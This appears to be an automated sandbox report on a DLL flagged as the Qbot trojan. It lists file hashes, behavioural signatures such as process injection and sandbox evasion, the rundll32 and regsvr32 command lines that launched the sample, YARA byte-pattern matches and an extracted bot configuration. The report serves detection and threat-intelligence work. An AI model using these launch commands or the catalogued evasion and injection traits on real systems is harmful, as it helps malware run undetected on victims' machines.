Windows Analysis Report
diatomaceous.dat.dll

Overview

General Information

Sample Name: diatomaceous.dat.dll
Analysis ID: 719511
MD5: 2e7f90e0c595d88d28f9fd979ccfcf33
SHA1: 8ff540ba601429c2ee0a444b0d2ec2650d178d23
SHA256: e3a2c056c730666fedabfed5e3cc2dee12d9c3ca36ac2d7c5289cfe29c125050
Tags: dll

Detection

Qbot
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Execute DLL with spoofed extension
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
PE file overlay found
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 5992 cmdline: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6116 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 244 cmdline: rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • wermgr.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • regsvr32.exe (PID: 6096 cmdline: regsvr32.exe /s C:\Users\user\Desktop\diatomaceous.dat.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • wermgr.exe (PID: 5020 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 3908 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • wermgr.exe (PID: 4860 cmdline: C:\Windows\SysWOW64\wermgr.exe MD5: CCF15E662ED5CE77B5FF1A7AAE305233)
    • rundll32.exe (PID: 1540 cmdline: rundll32.exe C:\Users\user\Desktop\diatomaceous.dat.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
Source | Rule | Description | Author | Strings
00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
    00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
    • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
    • 0x1ba14:$a4: %u;%u;%u;
    • 0x1bf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1bdd8:$a6: %u&%s&%u
    • 0x80c6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x8404:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
    • 0x2730:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2187:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
    • 0xbcee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
      00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
      • 0x1034f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Source | Rule | Description | Author | Strings
      8.0.wermgr.exe.e00000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
        8.0.wermgr.exe.e00000.0.raw.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
        • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        8.0.wermgr.exe.e00000.0.raw.unpack | Windows_Trojan_Qbot_3074a8d4 | unknown | unknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8cc6:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x9004:$set_key: 8D 87 00 04 00 00 50 56 E8 BF 15 00 00 59 8B D0 8B CE E8
        • 0x3330:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d87:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 F5 EF FF FF 83 C4 10
        • 0xc8ee:$generate_random_alpha_num_string: 57 E8 DC DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 D1 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        4.2.rundll32.exe.4820000.1.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
          4.2.rundll32.exe.4820000.1.raw.unpack | Windows_Trojan_Qbot_92c67a6d | unknown | unknown
          • 0x10f4f:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00

          Data Obfuscation

          Source: Process started Author: Joe Security: Data: Command: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: loaddll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll", ParentImage: C:\Windows\System32\loaddll32.exe, ParentProcessId: 5992, ParentProcessName: loaddll32.exe, ProcessCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\diatomaceous.dat.dll",#1, ProcessId: 6116, ProcessName: cmd.exe
          No Snort rule has matched

          AV Detection

          Source: diatomaceous.dat.dll ReversingLabs: Detection: 73%
          Source: diatomaceous.dat.dll Virustotal: Detection: 77%
          Source: diatomaceous.dat.dll Metadefender: Detection: 44%
          Source: diatomaceous.dat.dll Joe Sandbox ML: detected
          Source: 8.2.wermgr.exe.e00000.0.unpack Malware Configuration Extractor: Qbot {"Bot id": "BB", "Campaign": "1664535088", "Version": "403.902"}
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA82E60 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptDestroyHash,CryptReleaseContext,std::ios_base::_Ios_base_dtor,Concurrency::cancel_current_task,std::ios_base::_Ios_base_dtor,0_2_6DA82E60
          Source: diatomaceous.dat.dll Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
          Source: diatomaceous.dat.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: y'E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: loaddll32.exe, 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.320776013.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.320890751.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.320917782.000000006DAA4000.00000002.00000001.01000000.00000003.sdmp, diatomaceous.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000004.00000003.307936128.0000000003011000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307949517.000000000301B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.307921567.0000000003004000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.320543762.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.321666613.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.321909283.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.322091592.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DA994B5 FindFirstFileExW,0_2_6DA994B5
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0073C123 FindFirstFileW,FindNextFileW,3_2_0073C123
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_00735D1E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,3_2_00735D1E

          System Summary

          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.2.regsvr32.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 3.3.regsvr32.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 5.2.rundll32.exe.2cc0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.2.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 9.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 4.2.rundll32.exe.4820000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 7.0.wermgr.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000003.312922602.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000003.313259350.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000004.00000002.320649129.0000000004820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000005.00000002.320603133.0000000002CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000007.00000000.319688371.0000000001000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000003.00000003.312800639.0000000000400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000000.319841073.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 00000008.00000002.322126638.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.0.wermgr.exe.e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.2.rundll32.exe.4820000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 5.3.rundll32.exe.b90000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 8.2.wermgr.exe.e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.2fa0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.2fa0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 5.3.rundll32.exe.b90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
